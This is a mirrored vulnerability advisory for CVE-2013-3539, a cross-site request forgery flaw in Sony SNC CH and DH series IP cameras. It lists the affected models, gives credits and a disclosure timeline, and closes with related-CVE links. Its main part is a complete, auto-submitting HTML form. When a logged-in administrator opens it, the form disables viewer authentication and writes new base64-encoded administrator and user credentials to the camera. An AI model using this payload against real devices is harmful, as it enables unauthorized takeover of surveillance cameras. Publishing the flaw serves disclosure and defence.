Lucene search
Jonas Rapero Castillo1337DAY-ID-20887HistoryJun 14, 2013 - 12:00 a.m.
Sony CH / DH Cross Site Request Forgery Vulnerability
2013-06-1400:00:00
Jonas Rapero Castillo
0day.today
19
0.001 Low
EPSS
Percentile
49.4%
Sony CH and DH series IP cameras suffer from a cross site request forgery vulnerability.
1.Advisory Information
Title: Sony CH, DH Series Vulnerability
Date Published: 12/06/2013
Date of last updated: 12/06/2013
2.Vulnerability Description
We have been found the next vulnerability in this devices
-CVE-2013-3539. Cross Site Request Forgery(CWE-352)
3.Affected Products
CVE-2013-3539, the following product are affected SNC CH140, SNC CH180, SNC CH240, SNC CH280, SNC DH140, SNC DH140T, SNC DH180, SNC DH240, SNC DH240T and SNC DH280.
Itβs possible others models are affected but they were not checked.
4.PoC
4.1.Cross Site Request Forgery (CSRF)
CVE-2013-3539, CSRF via POST method. Targeted attack to any administrator.
These cameras use a web interface which is prone to CSRF vulnerabilities.
A malicious user can try targeted attacks by sending a special CSRF vector. This allows you to manipulate web interface parameters.
This is our .html attack.
_____________________________________________________________________________
<html>
<body>
<form name="SonyCsRf" action="http://xx.xx.xx.xx/command/user.cgi" method="POST">
<input type="Select" name="ViewerModeDefault" value="00000fff">
<input type="Hidden" name="ViewerAuthen" value="off">
<input type="Hidden" name="Administrator" value="YWRtaW46YWRtaW4=">
<input type="Hidden" name="User1" value="xxxx,c0000fff">
<input type="Hidden" name="User2" value="xxxx,c0000fff">
<input type="Hidden" name="User3" value="dG1wdG1wOnRtcHRtcA==,c0000fff">
<input type="Hidden" name="User4" value="Og==,00000fff">
<input type="Hidden" name="User5" value="Og==,00000fff">
<input type="Hidden" name="User6" value="Og==,00000fff">
<input type="Hidden" name="User7" value="Og==,00000fff">
<input type="Hidden" name="User8" value="Og==,00000fff">
<input type="Hidden" name="User9" value="Og==,00000fff">
<input type="Hidden" name="Reload" value="referer">
<script>document.SonyCsRf.submit();</script>
</form>
</body>
</html>
_____________________________________________________________________________
Now we can check that we have a new user in the configuration.
5.Credits
CVE-2013-3539 was discovered by JonΓ‘s Ropero Castillo. .
6.Report Timeline
-2013-05-25: Students team notifies the Sony Customer Support of the vulnerability. No reply received.
# 0day.today [2018-04-04] #Related
cve
cve
CVE-2013-3964
2022-10-03 16:14:46
cvelist
cvelist
CVE-2013-3964
2022-10-03 16:14:46
packetstorm
packetstorm
Samsung Series Cross Site Scripting
2013-06-13 00:00:00
Sony CH / DH Cross Site Request Forgery
2013-06-13 00:00:00
nvd
nvd
CVE-2013-3964
2013-10-01 19:55:09
prion
prion
Cross site scripting
2013-10-01 19:55:00